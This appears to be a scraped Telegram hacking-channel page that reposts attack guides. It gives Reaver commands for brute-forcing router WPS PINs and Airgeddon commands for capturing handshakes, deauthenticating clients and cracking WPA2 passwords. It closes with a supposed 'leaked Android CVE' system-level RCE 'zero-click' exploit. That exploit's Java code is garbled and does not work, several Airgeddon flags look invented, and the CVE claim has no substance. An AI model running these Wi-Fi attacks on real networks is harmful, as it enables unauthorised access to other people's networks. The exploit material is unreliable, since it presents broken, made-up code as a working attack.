UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Reaver - WPS PIN Brute-Forcing Tool

Reaver is a powerful tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) to recover the PIN used for authentication in wireless routers. It allows attackers to brute-force the WPS PIN and gain access to the target network.

---

### Basic Usage Command:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv


Explanation:
- reaver: Runs the Reaver tool.
- -i wlan0: Specifies the wireless network interface to use (replace wlan0 with your network interface name).
- -b XX:XX:XX:XX:XX:XX: Specifies the target router's BSSID (MAC address).
- -vv: Enables verbose output to display more information during the attack.

---

### Example: Specify a WPS PIN to Brute-Force
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -p 12345670 -vv


Explanation:
- -p 12345670: Attempts a specific WPS PIN, instead of brute-forcing the entire PIN.
- -vv: Provides detailed output for monitoring progress.

---

### Example: Save Results to a File
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv -o /path/to/output.txt


Explanation:
- -o /path/to/output.txt: Saves the output to a specified file for later analysis.

---

### Important Notes:
1. Reaver works only on routers with WPS enabled, and the attack may take several hours to complete depending on the router's implementation of WPS.
2. Legal Considerations: Always ensure that you have explicit permission to perform wireless network penetration testing on the target system. Unauthorized use of Reaver is illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Airgeddon - Wireless Security Auditing Tool

Airgeddon is a multi-use wireless security auditing tool that can be used to perform a variety of attacks on Wi-Fi networks, including WPA/WPA2 handshake capture, deauthentication attacks, and more. It is often used for auditing the security of wireless networks and cracking WPA/WPA2 passwords.

---

### Basic Usage Command:
airgeddon


Explanation:
- airgeddon: Runs the Airgeddon tool (the tool will prompt you for additional options such as selecting the wireless interface).

---

### Example: Capture WPA Handshake
1. Start the tool and select your network interface.
2. Choose to perform a WPA handshake capture.
airgeddon -i wlan0 --capture-handshake


Explanation:
- -i wlan0: Specifies the wireless network interface.
- --capture-handshake: Captures the WPA/WPA2 handshake, required for password cracking.

---

### Example: Deauthenticate Clients
airgeddon -i wlan0 --deauth


Explanation:
- -i wlan0: Specifies the wireless network interface.
- --deauth: Sends deauthentication packets to clients connected to a target network, forcing them to reconnect and allowing for handshake capture.

---

### Example: Crack WPA2 Password (using captured handshake)
Once the handshake is captured, you can use Airgeddon to start a dictionary attack:
airgeddon -i wlan0 --crack-wpa /path/to/wordlist.txt


Explanation:
- -i wlan0: Specifies the wireless network interface.
- --crack-wpa: Starts a brute-force attack to crack the WPA2 password using a provided wordlist.

---

### Important Notes:
1. Airgeddon is best used for wireless network penetration testing and is highly effective for auditing WPA2 networks.
2. Make sure you have permission before using this tool on any wireless network to avoid legal issues.
3. A strong wordlist is crucial for the success of WPA password cracking. Ensure your dictionary contains possible passwords for the target network.
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from Exploiting Crew (Pr1vAt3)
🦑The New Leaked Android CVE:

Android System Server RCE:
The Android System Server is responsible for managing system services and processes. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level.

Deployment and Execution
Build the malicious dex file using the dx tool from the Android SDK:

dx --dex --output=myexploit.dex myexploit.class

Create a new APK that includes the malicious dex file and any required dependencies:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.androidexploit">

<application>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>

</manifest>
Sign the APK with a valid signing certificate:
jarsigner -verbose -keystore mykeystore.keystore SysIntel.apk SysIntell

Install the signed APK on a vulnerable device.
Why it Works
The Android System Server is responsible for managing system services and processes, including the package manager. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level, gaining full control over the device.

Custom Zero-Click Exploit: Android Package Manager Service (PackageManagerService)
Create a custom zero-click exploit that targets a vulnerability in the Android Package Manager Service (PackageManagerService). This service is responsible for managing application installations and updates. Your exploit should allow an attacker to execute arbitrary code with system privileges.

Exploit Code
import android.content.pm.PackageParser;
import android.os.Build;
import android.os.Bundle;
import dalvik.system.DexClassLoader;

public class MainActivity extends androidx.appcompat.app.AppCompatActivity {

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

// Load the malicious dex file
String[] paths = getPackageCodePath().split(" ");
DexClassLoader cl = new DexClassLoader(paths, getPackageCodePath(), null, getClass().getClassLoader());

// Invoke the RCE method from the dex file
try {
Method m = cl.loadClass("com.example.malicious.Malware").getDeclaredMethod("executeRCE", String.class);
m.invoke(null, "Hello, Android!");
} catch (Exception e) {
e.printStackTrace();
}
}
}
How to Run
Build the malicious dex file using the dx tool from the Android SDK:

dx --dex --output=myexploit.dex myexploit.class
Create a new APK that includes the malicious dex file and any required dependencies.

Sign the APK with a valid signing certificate.

Install the signed APK on a vulnerable device.